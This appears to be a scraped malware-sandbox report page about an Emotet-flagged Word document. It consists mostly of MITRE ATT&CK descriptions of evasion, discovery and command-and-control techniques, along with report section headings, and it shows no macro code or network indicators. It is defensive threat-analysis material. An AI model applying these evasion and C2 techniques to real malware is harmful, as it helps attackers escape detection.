Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report ARCH_25_012021.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "ARCH_25_012021.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: A5ate73kc6cw5njy, Stream Size: 1173

General

VBA Code Keywords

VBA Code

VBA File Name: Gusca95luq_, Stream Size: 14646

General

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre